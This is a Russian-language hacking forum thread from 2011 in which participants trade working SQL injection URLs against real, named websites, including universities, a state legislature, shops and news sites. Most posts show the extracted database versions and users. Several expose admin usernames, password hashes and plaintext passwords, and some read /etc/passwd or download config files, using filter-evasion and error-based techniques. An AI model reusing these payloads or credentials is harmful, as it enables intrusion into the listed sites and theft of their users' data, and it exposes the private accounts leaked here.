http://www.product-key.com/product.php?id=-10+union+select+1,user(),3,4--
bloodAngel
21.04.2011, 11:59
Page Rank 6
Yandex Тиц 10
http://www.jazzmuseuminharlem.org/archive.php?id=-284+union+select+1,group_concat%280x3a,username,0x3a,hashed_password,0x3a,admin%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+staff_users
[COLOR=Green][IP:140.112.65.138][/COLOR] [COLOR=Blue][PR 5][/COLOR]
http://tao.cgu.org.tw/index.php?id=%28892%29+and+%281%29=%282%29+union+select+1,2,3,4,5,6,7,8,USER%28%29,DATABASE%28%29,VERSION%28%29,12,13,14,15,16+--
tao@localhost - tao - 5.0.51a-24
bloodAngel
21.04.2011, 17:32
http://www.langanesbyggd.is/category.php?catID=-17+union+select+1,version%28%29,3,4,5,6,7
4.0.18-standard-log
http://www.urbansurvivalstories.com/category.php?catID=-1+union+select+1,group_concat%28table_name,%22\n%22%29,3,4,5+from+information_schema.tables--
version : 5.0.45
http://www.kisan.com.ua/g.php?id=-1+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3--
kisan:4.1.22-log:kisan@alpha
http://www.trpbrakes.com/category.php?catid=-183+union+select+1,2,version%28%29,4,5,6--
5.1.47-COMMUNITY-LOG
PR4
http://www.thorshofn.is/category.php?catID=-17+union+select+1,2,version%28%29,4,5,6,7--
4.0.18-standard-log
http://www.buktour.com.ua/plan.php?id=-3+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6--
buktour_bd2:5.0.92:buktour_uesre@localhost
http://www.buktour.com.ua/plan.php?id=-3+union+select+1,2,concat_ws%280x3a,login,password%29,4,5,6+from+auth--
http://autoportal.od.ua/?a=test_full&id=-77+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3,4,5,6--
auto_db:4.1.22-standard:auto_root@localhost
bloodAngel
23.04.2011, 20:30
http://skatelv.no-ip.com/comments.php?id=-620%27+union+select+1,2,user%28%29,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17+--+
skatelv@localhost 5.1.41-3ubuntu12.10
Pr 5
Тиц 10
http://www.sci.nu.ac.th : PR - 5
Уязвимый скрипт
E:\wwwroot\sciweb\webboard\view.php
Эксплойт
_http://www.sci.nu.ac.th/webboard/view.php?dep=bio&id=1+union+select+1,2,3,group_concat%28table_name%29,5,6,7+from+information_schema.tables+--+
Тип БД :MySQL
Версия БД: 5.1.37-1ubuntu5.1
Имя ДБ: Weboard
Имя пользователя: tanakornp@webdata_1000
theperfectworld.us/: PR - 4
Уязвимый скрипт
/home/perfecto/perfectworldtoo.us/public_html/preflight/indexFunctions.php
Эксплойт
_http://www.theperfectworld.us/thread.php?id=-1'+union+select+substring(group_concat(table_name),250),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
Тип БД :MySQL
Версия БД: 5.1.53-log
Имя ДБ: perfectdb
Имя пользователя: perfectdb@jmkdb.theperfectworld.us
http://www.san-accessory.ru/productinfo.php?kod=1402.310+and+1=2+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14--
MIRMEX_PROMO1:5.1.37-1UBUNTU5.5-LOG:MIRMEX_PROMO1@LOCALHOST
http://www.orientalstudies.ru/rus/index.php?option=com_personalities&Itemid=74&person=-11+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID%28%28select+version%28%29+limit+0,1%29,1,63%29,FLOOR%28RAND%280%29*2%29%29%29+--+
www.orientalstudies.ru
version 5.0.37
pr7 тиц375
CodeSender:)
24.04.2011, 15:54
http://www.linorusso.ru/catalog.php?parent_id=&tov_id=952+union+select+1,concat_ws(0x3a,login,pass),3,4,5+from+opt_user--+
[6.0.11-alpha-log]
http://www.pokupka.perm.ru/index.php?page=2&cat_sale=-20+UnIon+selECt+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+
[4.1.11-Debian_4sarge2-log 5]
http://www.intelstudy.ru/schools.php?so=showschool&s_id=216&ct_id=-40+UnIon+selECt+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--+
[5.0.67-percona-highperf-b7-log]
http://www.intour.ru/countries.php?country_id=-404+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,uNhex%28hEx%28coNcaT_wS%280x3a,username,user_password%29%29%29+FroM+phpbb_users+LimiT+1,1+--+
Cennarios
25.04.2011, 02:18
Хостинги
http://www.eswap.ca/host/mod.php?mod=faq&mode=show&faq_id=3/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,table_name,16/**//*!from*//**/information_schema.columns--+
Массовый дамп в выводе =)
http://www.glorihosting.com/info.php?id=-24%27+union+select+1,2,user%28%29,version%28%29,5,6,7--+
Лучше бы мне нас**ли в утреннюю кашу! Баанк!!! (со Jay & silent Bob)
http://nabazar.com.ua/?action=items&id=-11291+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
nabazar_board:5.0.22:nabazar@localhost
http://1dnevnik.ru/schools/i/logo.png
http://1dnevnik.ru/schools/school.php?id=%28-83942%29union%28select%201,2,3,4,version%28%29%29
Ломоем школьнегов
http://www.nasha-spravka.ru/?abc=2&city=-129+union+select+concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--
spravka_2:5.1.56:spravka_2@localhost
http://vsemisto.com.ua/index.php?page=2&id=4643+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15--
dovidka_vm:5.1.47-community-log:dovidka_user@webua1.ukrhosting.com
winstrool
27.04.2011, 12:09
http://cplay.ru/game.php?id=-13+union+select+1,2,3,4,concat_ws%280x3a,name,pwd,salt%29,6,7,8,9,0,11+from+user--
http://www.fanfooty.com.au/game/report.php?id=3689+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13,14--
5.0.86:fanfooty@localhost:fanfooty
http://www.supersurge.com/games/game.php?id=-6056+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,0,11,12,13--
5.1.47-community-log:xaoonet_super@localhost:xaoonet_super
http://java-bookz.h2m.ru/java-game/game.php?id=-369+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3--
5.0.51a:db_java_bookz@localhost:db_java_bookz
шкoльнек
28.04.2011, 06:57
http://cnopic.ru/catalog.php?id=4712%27%20AND%201%3D2%20UNION%20SELECT%201%20%23
4.1.21-log : udb5600 : Uwww5600S@localhost
http://i026.radikal.ru/1104/1a/7cde65a16038.jpg
http://www.arabdetroit.com/news.php?id=-27335'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+config--+
[COLOR=PaleGreen]PR 5[/COLOR]
[COLOR=Black]Хэши не расшифровал.[/COLOR]
LiRvD082
28.04.2011, 13:35
http://www.antiquesincanada.com/shop.php
?myID=-276+UNION+SELECT+1,2,group_concat(unhex(hex(user_name))),group_concat(unhex(hex(user_pass))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+admin_users--+
http://www.canadiandesi.com/shop.php?BID=-61009+UNION+SELECT+1,2,3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=0x627573696e657373--
http://www.globalbeds.co.uk/category.php?manufid=-1+UNION+SELECT+1,2,3,4,group_concat(column_name)+from+information_schema.columns+where table_name=0x74626c61646d696e--+
Admin31da206ea6d47ec8a5e979b6bf44d681:pedro1954
http://www.magnifix.co.nz/magnifix/showproduct.php?id=-24+UNION+SELECT+1,2,3,group_concat(0x3a,username,password)+from+admin_panel--+
nadeem:khan,mudit123:muditmisra,shivani@magnifix.co.nz:5767571,marc@magnifix.co.nz:2650070,mudit@magnifix.co.nz:navya28,satwinder@magnifix.co.nz:2650070,darshak@magnifix.co.nz:2650070
http://s59.radikal.ru/i164/1104/2f/c217e6b735a3.png
http://www.tvigle.ru/img/v3/l.png
[COLOR=DarkGreen][SIZE=5]PR-6[/SIZE][/COLOR]
http://www.tvigle.ru/category/cinema/video/?sort=-1884%29%29+union+select+1,2,concat_ws%280x3a,id,name,email,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tvigle_rf.be_user+limit+20,1000+--+
http://www.womencraftlink.net/showFoto.php?galName=galerie_6&id=134+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--
peyer_main:5.0.51a-24+lenny5:peyer@localhost
DezMond™
29.04.2011, 14:20
[COLOR=DarkOrange]linn.dlrg.de[/COLOR]
http://linn.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&cHash=b6bf96f6dac665abaea06aea2e150c3c
[COLOR=DarkOrange]abayan.de PR3[/COLOR]
http://www.abayan.de/index.php?id=4&no_cache=1&cmode=99&pg=&mode=3&lanid=1180&anbid=1063&erzid=1180+union+select+1,2,3,4,5,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+--+&cHash=f4dbe36977d98285737a48d8aa7cb3a3
[COLOR=DarkOrange]kindermissionswerk.de PR5[/COLOR]
http://kindermissionswerk.de/shop/index.php?sessionid=39409321486eb6f3a00e66a0623f1e61&kat=-99+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+group+by+table_schema+limit+0,1+--+&actiontyp=artikelinwarenkorb
[COLOR=DarkOrange]neoriginal.ru ТИЦ50[/COLOR]
http://www.neoriginal.ru/cat/audi/part/u/0/mod/77/kat/264/year/2004/grp/1/idcnt/15/subgrp/-24431+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+--+
[COLOR=DarkOrange]feierwerk.de PR4[/COLOR]
http://feierwerk.de/angebote/dschungelpalast/programm/details.html?tx_wfqbe_pi1%5Beid%5D=1967+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables+--+
[COLOR=DarkOrange]asso.angers.fr PR4[/COLOR]
http://asso.angers.fr/detail_asso.php?id_asso=-5974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,login,20,21,22,23,24,25,26+from+admin+--+
[COLOR=DarkOrange]campus.igw.edu [/COLOR]
http://campus.igw.edu/kursliste/kurse_detail.php?kursID=-4411+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+&SN=wvimqrfaf
[COLOR=DarkOrange]contrefacon-danger.com PR7[/COLOR]
http://www.contrefacon-danger.com/front/show_rub.php?rub_id=260&archive=0'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13+--+
[COLOR=DarkOrange]zenar.boku.ac.at PR5[/COLOR]
http://zenar.boku.ac.at/en/links/links_detail.php?ID=-1+union+select+1,2,3,4,5,6+--+
[COLOR=DarkOrange]wallawalla.edu PR5[/COLOR]
http://www.wallawalla.edu/academics/library/typo3/showdescr.html?ID=-22'+union+select+1,2+--+
[COLOR=DarkOrange]site.medair.org [/COLOR]
http://site.medair.org/en_portal/hr/job/job_details_hq.php?jcode=-CH_HQS_GAM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+/*+
[COLOR=DarkOrange]bioinf-applied.charite.de [/COLOR]
http://bioinf-applied.charite.de/fragment_store/src/download.php?fragment_id=-374+union+select+user()+--+
[COLOR=DarkOrange]esellers-guide.de PR2[/COLOR]
http://esellers-guide.de/index.php?page=view_text&type=articles&category=19&pre_category=1&text_id=-37'+union+select+1,2,3,4,5,6,7,8+--+
[COLOR=DarkOrange]fondation-saint-hubert.be PR4[/COLOR]
http://www.fondation-saint-hubert.be/visu.php?cible=-18+union+select+1,2,3,4,5,6+--+
[COLOR=DarkOrange]suurmond.be PR2[/COLOR]
http://www.suurmond.be/producten/groep.php?groepid=-50+union+select+1,2,3,4,5,6,7,8,9,10,11+--+&merk=0'
[COLOR=DarkOrange]dmc.metu.edu PR5[/COLOR]
http://www.dmc.metu.edu/DMC/download.php?fname=./config.php
winstrool
29.04.2011, 17:35
http://www.newsofnepal.com/artistgallery.php?id=-25+union+select+concat_ws(0x3a,admin_user,admin_pass)+from+admin
вывод в исходниках:
http://www.us-sneaker.com/list.php?id=-1049+union+select+group_concat%28uEmail,0x3a,uPassword%29+from+tb_user
http://www.orgdosug.ru/pub.php?pid=-1696+union+select+1,concat_ws(0x3a,version(),user(),database())
http://www.zaward.com/products_detail.php?Pid=-2310+union+select+1,concat_ws%28version%28%29,user%28%29,database%28%29%29,3--
zaward@zaward.com5.0.51a-3ubuntu5.8db_zaward
http://www.strin.ru/magazinlnk.php?pid=-100081+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29
5.0.89-log:u6351@be2:u6351
PR3
http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
почти весь хостинг подвержен этому
winstrool
30.04.2011, 00:20
PR: 4
http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%280x3120616e6420313d3220756e696f6e2073656c65637420312c322c332c67726f75705f636f6e636174286c6e616d652c307833612c706173732c307833612c656d61696c292066726f6d207573657273202d2d2031%29,5,6,7,8,9,10,11,12
Cennarios
30.04.2011, 02:04
http://[COLOR=Red]www.esne.edu/noticias2.php?info=Noticias&Id=-354+union+select+1,user%28%29,3,4,5[/COLOR]--+
Freece.com : PR - 4
MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )
DATABASE:Pharmcon
USERNAME:PharmCon_reader
VULN SCRIPT PATH:D:\www\FreeCE_classic\www\forum\Forum_Details.asp
Exploit:
http://www.freece.com/forum/Forum_Details.asp?dbForumID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('vwCertInvoice','tbBlogRSS','tbCountry','vwClassQuestion','vwEventEval','tbCardType','vwInvoice','tbCCIDcodes','vwClassQuestionResults','tbCCTranType','tbClassAnswers','tbClassChoice','tbCertRequest','Temp','tbClassGrade','tbInstructorApprove','tbeTrack','dtproperties','tbClassQuestion','tbInstApproveDetails','TEMP_NewLogins','tbMemAutoRenewTrack','tbDocuments','tbInvoice','tbEmailAddresses','TEMP_NewState','tbEmailJob','TEMP_StateCodes','tbEvaluation','TEMP_ZipCodes','tbEventDocs','TEMP_NewEmails','tbEventHomePage','TEMP_CountryCodes','tbCustomerImportRoles','tbCustomerMailList','tbEventType','tbEvMailDocs','vwBrokerReportInvoice','tbFilter_Competitor','tbFilter_DirtyWord','tbOutComeSurvey','tbMailRefer','tbForum','tbForumMessage','tbInstructorConflict','tbInstructors','tbMemberPackage','tbOnLocationClasses','tbSurveyParticipants','tblForums','tbInstHonorStatus','Temp_Josh','tbLinks','tbInstHonorDetails','tbMemberCoupon','tbLiveChat','tbInstHonorarium','tbLiveImages','i td..'))--
IMPORTANT TABLES:
tbEmailAddresses
tbForum
tbInstructors
tblUsers
-User_ID
-UserName
-Password
http://ochki.ru/retail/shops/search/?city=1&collection=-escada'+union+select+1,concat_ws(0x3a,login,password),3,4,5,6+from+ochki_cms_users+limit+1,1+--+'
http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
.......
assinjeans
01.05.2011, 12:17
http://www.azizbehich.com/news.php?id=-132+union+select+1,2,3,version(),user(),6,7,8,9,10+--
4версия=(
http://s012.radikal.ru/i319/1105/3a/0b3306995689.jpg
http://sportpickgoods.com/view.php?id=-61738+union+select+1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tb_admin--+
Dr..VATSON
01.05.2011, 21:57
http://www.elavik.ru/catalog.php?action=goods&id=-177+union+select+version%28%29,2+--+
[COLOR=SandyBrown]5.1.41-log[/COLOR]
Cennarios
02.05.2011, 02:51
http:/[COLOR=Red]/www.bryantx.gov/include/press_release.asp?id=-1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user%28%29,10,11,12[/COLOR]--+
Osstudio
02.05.2011, 14:08
http://portalxm.com/index.php?id=1'+and+1=0+union+select+1,2,3,group_concat(table_name+separator+0x3a),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x76696e746167645f617a697a/*
тИЦ 600
http://www.efko.ru/page.php?id=37'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())--+
Вывод в Location: The requested URL /newefko@localhost:newefko2:5.0.77-log was not found on this server.
-------------------
EDU:
http://casgroup.fiu.edu/dll/events.php?id=459+and+1=2+union+select+1,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9--+
casweb@GOPANTHER.fiu.edu:cas:4.1.14-nt-log
-------------------
http://globalanuncio.com/view.php?id=56688+and+1=2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21--+
globaldbuser@localhost:5.0.77:globalanuncio
-------------------
http://onlineoffshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb'+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--+
calculator@cgi1401.int.bizland.net:5.0.91-log:onlineoffshoredb
------------------
http://pole1.ru/tovar.php?id=8+and+1=2+union+select+1,2,UNHEX(HEX(concat_ws(0x3a,user(),version(),database()))),4,5,6,7--+
aqq7328_strina@localhost:5.0.92-community-log:aqq7328_lopata
"Чудо лопата" :D
--------------------
Шоп
http://www.arttoframes.com/cartmanager_search.php?parent_sku=cdm-144-FRBW26061&size=36x12&color=215'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+
Duplicate entry '5.0.451' for key 1
-----------------
http://www.bienesonline.com/venezuela/inmobiliarias.php?ID=15+and+1=2+union+select+concat_ws(0x3a,user(),version(),database())--+
admin_bieneson@localhost:5.0.67-community-log:admin_bienes_venezuela
-----------------
http://www.birdjam.com/article.php?gid=0'&hilow=asc&monyr=4-2011&page=twitch_hiscores'+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11--+
birdjam2@localhost:5.0.27:birdjam2
-----------------
http://www.cymbalhouse.com/shopping/pgm-more_information.php?id=1602'+and+1=2+/*!UnIon*/+selECt+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--+
zilze3_sope1@localhost:5.1.52:zilze3_sope1
-------------------
ВсеМайки.РУ - крупный сайт по продаже футболок со своей ПП.
http://www.vsemayki.ru/basket_to.php?id=795'+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2--+&color=red&size=M%20%2846-48%29&model=man&hand=short&num=1
vsemayki_ru@server.vsemayki.ru:5.1.50-rel11.4-log:vsemayki_ru
------------------
http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+
smdaily2@localhost:4.0.25:smdaily2
http://www.sfors.ru/go.php?id=-1'+union+select+concat_ws(0x3a,user(),version(),database())+--+
other@localhost:5.0.45-log:sfors
bloodAngel
02.05.2011, 23:17
шоп
http://riddim.de/new.php?id=-348+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name%3E0x7461626C655F343030--
http://riddim.de/new.php?id=-348+union+select+1,2,3,4,database%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18--
database: riddim
winstrool
03.05.2011, 13:34
http://nskphone.ru/item.php?id=-72+union+select+1,2,3,4,group_concat(password,0x3a,email),6,7,8,9,0,11,12+from+accounts
http://lejonline.com.au/lej/item.php?itemid=-2737+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9--
5.0.92-community:wwwlej_ro@localhost:wwwlej_db4
http://www.datefinder.co.nz/member/user_profile.asp?user_id=-185%20UnIon+selECt+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+
5.0.27-community
winstrool
03.05.2011, 18:49
PR: 1
http://www.cenatural.com.au/item.php?pid=-121+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17--
5.0.91-log:cenat_db:cenat@10.194.10.112
totenkopf
03.05.2011, 18:51
http://www.tisc.co.uk/print.php?pid=-51+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
tisc@localhost:5.0.77:tisc
http://felixonline.co.uk/print.php?article=-900+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
media_felix@localhost:5.0.90-log:media_felix
http://www.lccc.co.uk/print.php?p=news&id=-3313+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28+--+
lccc-root@localhost:5.0.51b-log:lcccmain
http://www.inspire.org.uk/new/print.php?page=-135+UNION+ALL+SELECT+NULL,NULL,NULL,concat_ws(0x3a,user(),version(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+
inspire_webuser@localhost:4.1.22-standard:inspire_webdbase
http://www.simplynetworking.es/advert_clicks.php?id=-416+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3b,0x3b,user(),version(),database()),8,9,10,11,12,13,14,15+--+
simply@localhost;4.1.22;simply_networking
http://www.wilcocksassociates.co.uk/articles.php?id=-9258+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
wilcock2_site@localhost:5.0.92-community:wilcock2_site
Cennarios
04.05.2011, 01:39
http://[COLOR=Red]www.auhs.edu/mainpage.php?pageID=-13/**//*!union*//**//*!select*//**/user%28%29,2,3,4,5,6[/COLOR]--+
winstrool
04.05.2011, 01:51
http://www.discountfilters.com.au/item.php?id=-23+union+select+concat_ws(0x3a,version(),database())--
5.0.92-community:discount_commerce
http://www.market.aaba.com.au/item.php?id=1+and+1=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
5.0.92-community:aaba_auct1@localhost:aaba_auct1
// по прозьбе трудящихся была убрана ;)
http://www.simpleasthat.com/content/resources.php?id=-00239+union+select+1,2,3,4,5,6,table_name,concat_ws(0x3a,version(),user(),database()),9,0,11,12,13,14,15+from+information_schema.tables--
5.0.91-log:simpleas_2_w@209.68.1.191:simpleas_cma
[COLOR=white]www.clei.cl[/COLOR]
pr- [COLOR=DarkRed]6[/COLOR]
[COLOR=DarkOrange]http://www.clei.cl/cleiej/paper.php?id=32+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+LIMIT+1,1--[/COLOR]
Database Version: 5.1.51-log
Database name: clei
User name: clei@localhost
alphazone4.com :: PR - 3
Эксплойт
http://www.alphazone4.com/m/store/US.php?cat=1+union+select+1,substring%28group_concat%28unhex%28hex%28table_name%29%29%29,250%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
5.0.77
admin@localhost
alphazone4
[RedSky]
05.05.2011, 22:03
Ситуация: пробельные символы попадают без юрлдекодирования в запрос + однострочным комментом запрос не отсечь.
Решение(замена пробельного символа, вывод в ошибке и закрытие ковычки, вместо ее отсечения):
http://www.vw-axsel.ru/catalog/tiguan/'/**/and(1)IN(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))from(information_schema.tables)group/**/by/**/2)a)and'
http://cakerysupplies.com/ : PR 4
Тип БД:МS ACCESS
Имя БД:cakery
Эксплойт
http://cakerysupplies.com/store/WsDefault.asp?One=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8+from+products
По ходу принтабельных столбцов не нашлось, крутить по типу блайнl не было смысла - БД как я понял служит только для обеспечения информацией о товарах, следовательно никаких паролей и юзеров там нет
winstrool
06.05.2011, 23:36
pr:5 тиц:350
http://www.uni.ru/articles.php?action=show&id=-43+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9+from+users--
тиц:40
http://infosfera.sfo.ru/a/articles.php?cat_id=&id=550+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9--
infosfera@localhost:4.0.24_Debian-10sarge3-log:infosfera
pr:5
http://old.cageprisoners.com/articles.php?id=-14677+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6--
5.0.84:cagepris_user@localhost:cagepris_cms
Законодательная Власть Штата Аризона
http://www.az[ZZZ]leg.[COLOR=Red]gov[/COLOR] : PR 6
Тип БД:Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Имя БД:Status
Имя пользователя БД:webuser
Эксплойт
http://www.az[ZZZ]leg.gov/DocumentsForBill.asp?Bill_Number=1%27+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+%28%27Committee_Actions%27%29%29--
Таблицы
Committee_Actions
Committee_Members
хочешь еще? - добывай сам! :D
[RedSky]
07.05.2011, 00:56
Ситуация: вывод через двойной запрос
Решение:
http://mindlessgaming.com/?page=match&action=view&match_id=1'and(0)union select " 1'and(0)union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14-- -"-- -
bloodAngel
07.05.2011, 11:53
http://www.soundtrackcovers.ru/catalogue.php?id=671-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.25
http://www.finances-pedagogie.fr/pages/publications.php?id=34-999.9+union+select+1,2,version(),4,5,6--
4.0.27-max-log
Pr 5
http://www.lavallart-associes.com/texte_publications.php?id=49-999.9+union+select+1,2,3,4,5,6,7,version()--
5.1.41-3ubuntu12
http://www.avance-org.fr/publications/publications.php?idFamille=2-999.9+union+select+1,2,3,4,5,6,version()--
5.0.32-Debian_7etch12-log
Cennarios
07.05.2011, 22:13
Заметно, что на сайте присутствует гей - тематика....
http://[COLOR=Red]www.bayareareporter.org/news/article.php?sec=news&article=-5000+union+select+1,table_name,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7+from+information_schema.columns+where+column_name+like+%22%login%%22+limit+0,1[/COLOR]--+
[RedSky]
08.05.2011, 00:24
Ситуация: инъекция в рефере, в инсерт запросе, вывод в ошибке.
Решение:
http://74auc.ru/index.php
referer: asd')on duplicate key update a=(select 1 from(select name_const(version(),1),name_const(version(),1))a)-- -
Osstudio
09.05.2011, 21:37
http://faraon.stfaraon.ru/site.php?id=30065+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x666172616f6e7374666172616f6e--
Megwarez
10.05.2011, 18:02
[COLOR=DarkGreen]edu [/COLOR]
http://art.colorado.edu/hiaff/section.php?id=-4+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
[COLOR=DarkGreen]pr6[/COLOR]
http://www.adas-fusion.eu/theme.php?id=-3+union+select+1,2,3,group_concat%280x0b,table_name%29,5,6+from+information_schema.tables+--
[COLOR=DarkGreen]pr5[/COLOR]
Osstudio
10.05.2011, 19:52
http://www.weddingcards.ru/catalog.php5?catid=3+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4+from+information_schema.tables+where+table_schema=0x73697465736574755f776564--
ACCOUNT:BASKET:CATEGORY:ITEM:ORDER_SEQUENCE:PHOTO:SERVICE:SESSION_LOG:TEXT
Догадываетесь, какое поле взять?! ;)
Osstudio
10.05.2011, 22:21
